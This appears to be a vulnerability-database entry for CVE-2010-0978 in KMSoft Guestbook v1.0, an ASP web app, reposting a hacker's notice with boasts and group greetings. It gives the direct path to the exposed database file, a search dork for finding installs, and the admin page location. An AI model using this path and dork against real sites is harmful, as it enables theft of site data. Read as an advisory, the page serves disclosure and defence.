KMSoft Guestbook v 1.0 Database Disclosure Vulnerability

2010.03.19

Credit: LionTurk

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2010-0978

CWE: CWE-264

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

============================================================================== 
 
                      _      _       _          _      _   _ 
 
                     / \    | |     | |        / \    | | | | 
 
                    / _ \   | |     | |       / _ \   | |_| | 
 
                   / ___ \  | |___  | |___   / ___ \  |  _  | 
 
                  /_/   \_\ |_____| |_____| /_/   \_\ |_| |_| 
 
============================================================================== 
 
        [?] ~ Note : Mutlu Yillar Millettt
 
============================================================================== 
 
        [?]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability 
 
============================================================================== 
 
    [?] Script:             [ KMSoft Guestbook v 1.0 ] 
 
    [?] Language:           [ ASP ] 
 
    [?] Download:           [ http://kmsoft.org]
 
    [?] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
    [?] My Home:            [ RevengeHack.com & Ar-ge.Org] 
 
    [?]N0T3    :             Yeni Aciklarimi Bekleyin.
 
########################################################################### 
 
===[ Exploit And Dork  ]=== 
 
  [?] http://server/[dizin]/db/db.mdb
 
  [?] KMSoft Guestbook v 1.0 Powered by KMSoft or  Powered by KMSoft
 
  [?]   Admin Page: /admin
 
Author:  LionTurk <- 
 
Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng
Ar-ge.Org :Cyber_945,D3xer
 
- Kritik Benim,Kritigi Ben Bellerim,Kzdrmayn Benim Alayinizi Keserim
- Ben Ne Heykirlar Gordum  site heyklicek exploiti yok.Ben Ne exploitler gordum kullancak heykir yok :D
 
###########################################################################

References:

http://xforce.iss.net/xforce/xfdb/55376

http://www.exploit-db.com/exploits/11005

http://secunia.com/advisories/38076

http://packetstormsecurity.org/1001-exploits/kmsoftgb-disclose.txt

http://osvdb.org/61487

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

KMSoft Guestbook v 1.0 Database Disclosure Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.